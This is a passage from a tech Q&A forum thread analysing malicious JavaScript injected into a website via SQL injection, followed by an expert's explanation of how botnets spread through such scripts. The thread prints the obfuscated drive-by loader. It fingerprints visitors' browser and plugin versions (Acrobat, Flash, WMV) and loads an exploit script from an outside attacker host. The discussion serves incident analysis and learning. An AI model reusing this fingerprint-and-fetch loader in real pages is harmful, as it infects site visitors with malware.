The code only checks that known-to-be-vulnerable software is installed and then directs the browser to download an exploit for that software.  This particular script is checking the version of the browser and the language in use so the exploit downloaded by the client after executing this javascript will likely be a browser specifc exploit for specific languages (such as http://blog.mozilla.com/security/2008/05/07/compromised-file-in-vietnamese-language-pack-for-firefox-2/).
Attached is an example of plugin discovery where the code checks that particular versions of shockwave and acrobat are installed and that the browser will accept content with a mime-type of video/x-ms-wmv
if (!document.JTg_UiwL) {

	var dkmHWYEA = '0';

	var cdNsOzhZ = '00';

	var hXMX9MQS = '00';

	var UXlZ5qAL = '00';

	try {

		for (var FGETNEhb=0;FGETNEhb 0) {

			dkmHWYEA = IDzn62zR.toString(16);

		}

	}

	if (cdNsOzhZ == '00' && JTkc_ZZB.indexOf("Adobe Acrobat") != -1) {

		JTkc_ZZB = navigator.plugins[FGETNEhb].description;

		if (JTkc_ZZB.indexOf(" 5") != -1) {

			cdNsOzhZ = '05';

		}

		else if (JTkc_ZZB.indexOf(" 6") != -1) {

			cdNsOzhZ = '06';

		}

		else if (JTkc_ZZB.indexOf(" 7") != -1) {

			cdNsOzhZ = '07';

		}

		else {

			cdNsOzhZ = '01';

		}

	}

	if (hXMX9MQS == '00' && JTkc_ZZB.indexOf("Shockwave Flash") != -1) {

		var Ko8Mfm1E = '';

		JTkc_ZZB = navigator.plugins[FGETNEhb].description;

		for(var WbyC3TJf = 0; WbyC3TJf < JTkc_ZZB.length; WbyC3TJf++) {

			var YOFgsbOa = JTkc_ZZB.charAt(WbyC3TJf);

			if (!isNaN(parseInt(YOFgsbOa)) || (YOFgsbOa == '.' && Ko8Mfm1E.length > 0)) {

				Ko8Mfm1E += YOFgsbOa;

			}

			else if (Ko8Mfm1E.length > 0) {

				break;

			}

		}

		var Mt2247pE = Ko8Mfm1E.split('.');

		if (Mt2247pE[0] < 9) {

			hXMX9MQS = '7c';

		}

		else if (Mt2247pE[0] == 9 && Mt2247pE[1] == 0 && Mt2247pE[2] < 115 ) {

			hXMX9MQS = '73';

		}

	}

	if (cdNsOzhZ != 0 && dkmHWYEA != 0 && hXMX9MQS != 0) {

		break;

	}

}

}

catch(e) { }

try {

	if (navigator.mimeTypes["video/x-ms-wmv"].enabledPlugin)

		UXlZ5qAL = '01';

}

catch(e) { }

while(dkmHWYEA.length < 8)

	dkmHWYEA = '0' + dkmHWYEA;

	var oM_AvlLJ = document.createElement("script");

	oM_AvlLJ.setAttribute("type", "text/javascript");

	oM_AvlLJ.setAttribute("src", "http://apps84.com/cgi-bin/index.cgi?b5f68c1d0100f0300077e0ed58020000000002fd94f5beff00" + dkmHWYEA + UXlZ5qAL + cdNsOzhZ + hXMX9MQS); // possibly: + "00000000" + "01" + "05||06||07" + "73||7c"

        document.body.appendChild(oM_AvlLJ);

}

Open in new window

0
 
LVL 4

Author Comment

by:bigstyler
ID: 21883829
1. So if I have well understood what you say, during "my" attack, the script is trying to gain access only through a browser exploit or there is a next step that I am missing?

2. I don't manage to find the correct URL, in my script quoted above, that will let met download the exploit used, if you can help me ...

3. What is the next step for the attacker ? If the exploit has been successfully executed on the client operating system, what's happen ? A trojan  is installed in the computer (and so the antivirus will see it I presume? )

Thank you so much for sharing your knowledge jahboite. I will really appreciate if we can speak each other about security. I don't know if it is possible to contact each other by mail/messenger etc...

Thanks again =))
0
 
LVL 12

Accepted Solution

by:
jahboite earned 350 total points
ID: 21884860
It's all about the botnets!
The compromised host (bot) that exploited a sql injection vulnerability on your webserver was part of a large, worldwide network of bots (the botnet).  The bot software running on these compromised hosts is capable of (but not limited to) the following:
Scan for and perform sql injection on webservers running ASP (and using MS SQL).
Serve HTTP requests from browsers for scripts that test for vulnerable software accessible to the browser (or the browser itself).
Serve HTTP requests for exploits that compromise more hosts (via the browser) and assimilate them into the botnet.

The scripts injected into your database are pointing to scripts hosted by domains used by bots.
These scripts then check for vulnerabilities in the software run on the machines of visitors to your site and then attempt to infect the machines of those visitors.
Once infected, your visitor's machines become part of the botnet, hosting more scripts and exploits to continue the cycle and grow the botnet.

Obviously, some of the malware is detected by some Anti-Virus software running on your visitors machines, but not all and not all your visitors use AV.

As for downloading the exploits, I've been trying myself, but so far, no luck...
0
 
LVL 4

Author Closing Comment

by:bigstyler
ID: 31470184
Thanks a lot jahboite.

I have learned a lot thanks to you
0

Featured Post

Find Ransomware Secrets With All-Source Analysis

Ransomware has become a major concern for organizations; its prevalence has grown due to past successes achieved by threat actors. While each ransomware variant is different, we’ve seen some common tactics and trends used among the authors of the malware.

Join & Write a Comment

Today, still in the boom of Apple, PC's and products, nearly 50% of the computer users use Windows as graphical operating systems. If you are among those users who love windows, but are grappling to keep the system's hard drive optimized, then you s…
Boost your ability to deliver ambitious and competitive web apps by choosing the right JavaScript framework to best suit your project’s needs.
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…

746 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

12 Experts available now in Live!

Get 1:1 Help Now